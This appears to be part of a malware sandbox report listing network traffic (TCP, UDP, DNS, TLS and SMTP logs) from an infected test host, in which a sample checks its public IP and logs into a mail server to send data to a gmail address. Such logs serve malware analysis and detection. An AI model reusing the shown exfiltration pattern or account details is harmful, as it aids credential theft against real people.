Nov 27, 2020 14:26:37.579968929 CET	587	49743	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:37.580184937 CET	49743	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:37.580234051 CET	49743	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:39.337718964 CET	49745	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:39.603138924 CET	587	49745	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:39.603286028 CET	49745	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:39.643336058 CET	49690	443	192.168.2.3	40.90.22.183
Nov 27, 2020 14:26:39.813266039 CET	443	49690	40.90.22.183	192.168.2.3
Nov 27, 2020 14:26:39.813486099 CET	49690	443	192.168.2.3	40.90.22.183
Nov 27, 2020 14:26:39.878669977 CET	49745	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:39.885345936 CET	587	49745	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:39.885472059 CET	49745	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:40.144205093 CET	587	49745	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:40.144962072 CET	587	49745	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:40.145092010 CET	49745	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:40.145679951 CET	49745	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:47.292326927 CET	80	49684	93.184.220.29	192.168.2.3
Nov 27, 2020 14:26:47.292606115 CET	49684	80	192.168.2.3	93.184.220.29
Nov 27, 2020 14:26:52.701853991 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:52.965517998 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:52.965743065 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:53.247958899 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:53.248662949 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:53.512720108 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:53.513416052 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:53.778031111 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:53.778347969 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.061188936 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:54.061547995 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.325247049 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:54.325603008 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.629018068 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:54.678740025 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:54.679126978 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.942498922 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:54.942570925 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:54.943231106 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.943399906 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.943571091 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.943732023 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.943901062 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.944045067 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.944201946 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.944354057 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.944506884 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.944654942 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.944813967 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.944962025 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.945111036 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.945267916 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.945441008 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:54.945590019 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.206770897 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.207134962 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.207257032 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.207292080 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.207428932 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.207515001 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.207622051 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.207834959 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.207998991 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.208122969 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.208256006 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.208323002 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.208448887 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.208713055 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.209594965 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.470988989 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.471040010 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.471056938 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.471234083 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.471426964 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.471456051 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.471528053 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.471576929 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.471606970 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.471792936 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.471959114 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.472106934 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.472857952 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.474277973 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.512942076 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.513616085 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.513873100 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.734837055 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.734883070 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.735034943 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.735196114 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.735274076 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.735316038 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.735409021 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.735517979 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:55.735584021 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.736233950 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.737544060 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.737571955 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.737669945 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.777218103 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.777262926 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.998862982 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.998907089 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.999157906 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:55.999557972 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:56.002332926 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:56.050344944 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:58.438446999 CET	443	49680	204.79.197.200	192.168.2.3
Nov 27, 2020 14:27:00.121506929 CET	80	49684	93.184.220.29	192.168.2.3
Nov 27, 2020 14:27:00.121639967 CET	49684	80	192.168.2.3	93.184.220.29
Nov 27, 2020 14:27:05.941169977 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:27:05.942816019 CET	49748	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:27:06.204503059 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:27:06.204690933 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:27:06.205818892 CET	587	49747	103.9.171.52	192.168.2.3
Nov 27, 2020 14:27:06.205902100 CET	49747	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:27:06.205914974 CET	587	49748	103.9.171.52	192.168.2.3
Nov 27, 2020 14:27:06.206002951 CET	49748	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:27:06.486670017 CET	587	49748	103.9.171.52	192.168.2.3
Nov 27, 2020 14:27:06.486910105 CET	49748	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:27:06.504870892 CET	49748	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:27:06.750746965 CET	587	49748	103.9.171.52	192.168.2.3
Nov 27, 2020 14:27:06.750868082 CET	49748	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:27:06.768119097 CET	587	49748	103.9.171.52	192.168.2.3
Nov 27, 2020 14:27:06.768219948 CET	49748	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:27:06.769289017 CET	587	49748	103.9.171.52	192.168.2.3
Nov 27, 2020 14:27:06.769355059 CET	49748	587	192.168.2.3	103.9.171.52

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2020 14:25:04.670833111 CET	60152	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:04.698086977 CET	53	60152	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:05.383215904 CET	57544	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:05.410538912 CET	53	57544	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:06.052160978 CET	55984	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:06.087801933 CET	53	55984	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:06.782588005 CET	64185	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:06.809679985 CET	53	64185	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:07.517072916 CET	65110	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:07.544064999 CET	53	65110	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:08.183290005 CET	58361	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:08.210572004 CET	53	58361	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:08.902954102 CET	63492	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:08.930222034 CET	53	63492	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:09.579035997 CET	60831	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:09.606163025 CET	53	60831	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:10.332566023 CET	60100	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:10.359648943 CET	53	60100	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:11.325078964 CET	53195	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:11.352227926 CET	53	53195	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:12.437009096 CET	50141	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:12.475356102 CET	53	50141	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:27.735615015 CET	53023	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:27.762844086 CET	53	53023	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:28.137470007 CET	49563	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:28.175828934 CET	53	49563	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:39.478696108 CET	51352	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:40.244265079 CET	53	51352	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:42.993508101 CET	59349	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:43.819489956 CET	57084	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:43.846821070 CET	53	57084	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:43.982381105 CET	59349	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:44.009459019 CET	53	59349	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:44.648421049 CET	58823	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:44.675628901 CET	53	58823	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:45.610944986 CET	57568	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:45.638127089 CET	53	57568	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:50.721287012 CET	50540	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:50.748570919 CET	53	50540	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:52.535218000 CET	54366	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:52.562628984 CET	53	54366	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:53.285748959 CET	53034	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:53.312868118 CET	53	53034	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:54.105633020 CET	57762	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:54.141134977 CET	53	57762	8.8.8.8	192.168.2.3
Nov 27, 2020 14:25:55.094934940 CET	55435	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:25:55.122128963 CET	53	55435	8.8.8.8	192.168.2.3
Nov 27, 2020 14:26:01.857494116 CET	50713	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:26:01.884722948 CET	53	50713	8.8.8.8	192.168.2.3
Nov 27, 2020 14:26:06.416886091 CET	56132	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:26:06.463174105 CET	53	56132	8.8.8.8	192.168.2.3
Nov 27, 2020 14:26:30.786530972 CET	58987	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:26:30.813698053 CET	53	58987	8.8.8.8	192.168.2.3
Nov 27, 2020 14:26:37.246206999 CET	56579	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:26:37.273241997 CET	53	56579	8.8.8.8	192.168.2.3
Nov 27, 2020 14:26:39.794296980 CET	60633	53	192.168.2.3	8.8.8.8
Nov 27, 2020 14:26:39.837749958 CET	53	60633	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 27, 2020 14:25:39.478696108 CET	192.168.2.3	8.8.8.8	0xdcfb	Standard query (0)	webmail.hapkidocollege.com.au	A (IP address)	IN (0x0001)
Nov 27, 2020 14:26:30.786530972 CET	192.168.2.3	8.8.8.8	0xb745	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 27, 2020 14:25:40.244265079 CET	8.8.8.8	192.168.2.3	0xdcfb	No error (0)	webmail.hapkidocollege.com.au		103.9.171.52	A (IP address)	IN (0x0001)
Nov 27, 2020 14:26:30.813698053 CET	8.8.8.8	192.168.2.3	0xb745	No error (0)	api.ipify.org	nagano-19599.herokussl.com		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2020 14:26:30.813698053 CET	8.8.8.8	192.168.2.3	0xb745	No error (0)	nagano-19599.herokussl.com	elb097307-934924932.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2020 14:26:30.813698053 CET	8.8.8.8	192.168.2.3	0xb745	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		174.129.214.20	A (IP address)	IN (0x0001)
Nov 27, 2020 14:26:30.813698053 CET	8.8.8.8	192.168.2.3	0xb745	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		50.19.252.36	A (IP address)	IN (0x0001)
Nov 27, 2020 14:26:30.813698053 CET	8.8.8.8	192.168.2.3	0xb745	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.225.66.103	A (IP address)	IN (0x0001)
Nov 27, 2020 14:26:30.813698053 CET	8.8.8.8	192.168.2.3	0xb745	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.225.169.28	A (IP address)	IN (0x0001)
Nov 27, 2020 14:26:30.813698053 CET	8.8.8.8	192.168.2.3	0xb745	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.243.164.148	A (IP address)	IN (0x0001)
Nov 27, 2020 14:26:30.813698053 CET	8.8.8.8	192.168.2.3	0xb745	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		184.73.247.141	A (IP address)	IN (0x0001)
Nov 27, 2020 14:26:30.813698053 CET	8.8.8.8	192.168.2.3	0xb745	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.252.4	A (IP address)	IN (0x0001)
Nov 27, 2020 14:26:30.813698053 CET	8.8.8.8	192.168.2.3	0xb745	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.225.220.115	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Nov 27, 2020 14:26:31.051835060 CET	174.129.214.20	443	192.168.2.3	49742	CN=*.ipify.org, OU=PositiveSSL Wildcard, OU=Domain Control Validated CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Wed Jan 24 01:00:00 CET 2018 Wed Feb 12 01:00:00 CET 2014 Tue Jan 19 01:00:00 CET 2010	Sun Jan 24 00:59:59 CET 2021 Mon Feb 12 00:59:59 CET 2029 Tue Jan 19 00:59:59 CET 2038	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
					CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Wed Feb 12 01:00:00 CET 2014	Mon Feb 12 00:59:59 CET 2029
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Jan 19 01:00:00 CET 2010	Tue Jan 19 00:59:59 CET 2038

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 27, 2020 14:25:41.367238998 CET	587	49719	103.9.171.52	192.168.2.3	220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:25:40 +1100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 27, 2020 14:25:41.368335009 CET	49719	587	192.168.2.3	103.9.171.52	EHLO 632922
Nov 27, 2020 14:25:41.634421110 CET	587	49719	103.9.171.52	192.168.2.3	250-c5s3-4e-syd.hosting-services.net.au Hello 632922 [84.17.52.25] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Nov 27, 2020 14:25:41.634907961 CET	49719	587	192.168.2.3	103.9.171.52	AUTH login dHJhaW5AaGFwa2lkb2NvbGxlZ2UuY29tLmF1
Nov 27, 2020 14:25:42.231693029 CET	49719	587	192.168.2.3	103.9.171.52	AUTH login dHJhaW5AaGFwa2lkb2NvbGxlZ2UuY29tLmF1
Nov 27, 2020 14:25:42.934869051 CET	49719	587	192.168.2.3	103.9.171.52	AUTH login dHJhaW5AaGFwa2lkb2NvbGxlZ2UuY29tLmF1
Nov 27, 2020 14:25:43.755945921 CET	587	49719	103.9.171.52	192.168.2.3	334 UGFzc3dvcmQ6
Nov 27, 2020 14:25:44.048384905 CET	587	49719	103.9.171.52	192.168.2.3	235 Authentication succeeded
Nov 27, 2020 14:25:44.048794031 CET	49719	587	192.168.2.3	103.9.171.52	MAIL FROM:<train@hapkidocollege.com.au>
Nov 27, 2020 14:25:44.314590931 CET	587	49719	103.9.171.52	192.168.2.3	250 OK
Nov 27, 2020 14:25:44.317465067 CET	49719	587	192.168.2.3	103.9.171.52	RCPT TO:<akannwater@gmail.com>
Nov 27, 2020 14:25:44.657011032 CET	587	49719	103.9.171.52	192.168.2.3	250 Accepted
Nov 27, 2020 14:25:44.657308102 CET	49719	587	192.168.2.3	103.9.171.52	DATA
Nov 27, 2020 14:25:44.922913074 CET	587	49719	103.9.171.52	192.168.2.3	354 Enter message, ending with "." on a line by itself
Nov 27, 2020 14:25:47.853806973 CET	587	49719	103.9.171.52	192.168.2.3	250 OK id=1kidkt-003UbD-Iv
Nov 27, 2020 14:25:49.862801075 CET	587	49724	103.9.171.52	192.168.2.3	220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:25:48 +1100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 27, 2020 14:25:49.866229057 CET	49724	587	192.168.2.3	103.9.171.52	EHLO 632922
Nov 27, 2020 14:25:50.129899979 CET	587	49724	103.9.171.52	192.168.2.3	250-c5s3-4e-syd.hosting-services.net.au Hello 632922 [84.17.52.25] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Nov 27, 2020 14:25:50.262506008 CET	587	49724	103.9.171.52	192.168.2.3	421 c5s3-4e-syd.hosting-services.net.au lost input connection
Nov 27, 2020 14:26:00.085405111 CET	587	49730	103.9.171.52	192.168.2.3	220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:25:58 +1100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 27, 2020 14:26:00.085947990 CET	49730	587	192.168.2.3	103.9.171.52	EHLO 632922
Nov 27, 2020 14:26:00.349783897 CET	587	49730	103.9.171.52	192.168.2.3	250-c5s3-4e-syd.hosting-services.net.au Hello 632922 [84.17.52.25] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Nov 27, 2020 14:26:00.356672049 CET	587	49730	103.9.171.52	192.168.2.3	421 c5s3-4e-syd.hosting-services.net.au lost input connection
Nov 27, 2020 14:26:10.958657980 CET	587	49739	103.9.171.52	192.168.2.3	220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:26:09 +1100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 27, 2020 14:26:10.958883047 CET	49739	587	192.168.2.3	103.9.171.52	EHLO 632922
Nov 27, 2020 14:26:11.222681046 CET	587	49739	103.9.171.52	192.168.2.3	250-c5s3-4e-syd.hosting-services.net.au Hello 632922 [84.17.52.25] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Nov 27, 2020 14:26:11.264421940 CET	587	49739	103.9.171.52	192.168.2.3	421 c5s3-4e-syd.hosting-services.net.au lost input connection
Nov 27, 2020 14:26:19.524956942 CET	587	49740	103.9.171.52	192.168.2.3	220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:26:18 +1100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 27, 2020 14:26:19.639858961 CET	587	49740	103.9.171.52	192.168.2.3	421 c5s3-4e-syd.hosting-services.net.au lost input connection
Nov 27, 2020 14:26:28.998317957 CET	587	49741	103.9.171.52	192.168.2.3	220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:26:27 +1100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 27, 2020 14:26:29.236226082 CET	587	49741	103.9.171.52	192.168.2.3	421 c5s3-4e-syd.hosting-services.net.au lost input connection
Nov 27, 2020 14:26:37.362380981 CET	587	49743	103.9.171.52	192.168.2.3	220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:26:36 +1100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 27, 2020 14:26:37.579276085 CET	587	49743	103.9.171.52	192.168.2.3	421 c5s3-4e-syd.hosting-services.net.au lost input connection
Nov 27, 2020 14:26:39.885345936 CET	587	49745	103.9.171.52	192.168.2.3	220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:26:38 +1100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 27, 2020 14:26:40.144205093 CET	587	49745	103.9.171.52	192.168.2.3	421 c5s3-4e-syd.hosting-services.net.au lost input connection
Nov 27, 2020 14:26:53.247958899 CET	587	49747	103.9.171.52	192.168.2.3	220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:26:51 +1100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 27, 2020 14:26:53.248662949 CET	49747	587	192.168.2.3	103.9.171.52	EHLO 632922
Nov 27, 2020 14:26:53.512720108 CET	587	49747	103.9.171.52	192.168.2.3	250-c5s3-4e-syd.hosting-services.net.au Hello 632922 [84.17.52.25] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Nov 27, 2020 14:26:53.513416052 CET	49747	587	192.168.2.3	103.9.171.52	AUTH login dHJhaW5AaGFwa2lkb2NvbGxlZ2UuY29tLmF1
Nov 27, 2020 14:26:53.778031111 CET	587	49747	103.9.171.52	192.168.2.3	334 UGFzc3dvcmQ6
Nov 27, 2020 14:26:54.061188936 CET	587	49747	103.9.171.52	192.168.2.3	235 Authentication succeeded
Nov 27, 2020 14:26:54.061547995 CET	49747	587	192.168.2.3	103.9.171.52	MAIL FROM:<train@hapkidocollege.com.au>
Nov 27, 2020 14:26:54.325247049 CET	587	49747	103.9.171.52	192.168.2.3	250 OK
Nov 27, 2020 14:26:54.325603008 CET	49747	587	192.168.2.3	103.9.171.52	RCPT TO:<akannwater@gmail.com>
Nov 27, 2020 14:26:54.678740025 CET	587	49747	103.9.171.52	192.168.2.3	250 Accepted
Nov 27, 2020 14:26:54.679126978 CET	49747	587	192.168.2.3	103.9.171.52	DATA
Nov 27, 2020 14:26:54.942570925 CET	587	49747	103.9.171.52	192.168.2.3	354 Enter message, ending with "." on a line by itself
Nov 27, 2020 14:26:55.735517979 CET	49747	587	192.168.2.3	103.9.171.52	.
Nov 27, 2020 14:26:56.002332926 CET	587	49747	103.9.171.52	192.168.2.3	250 OK id=1kidm1-003UfT-Jb
Nov 27, 2020 14:27:06.204503059 CET	587	49747	103.9.171.52	192.168.2.3	421 c5s3-4e-syd.hosting-services.net.au lost input connection
Nov 27, 2020 14:27:06.486670017 CET	587	49748	103.9.171.52	192.168.2.3	220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:27:05 +1100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 27, 2020 14:27:06.486910105 CET	49748	587	192.168.2.3	103.9.171.52	EHLO 632922
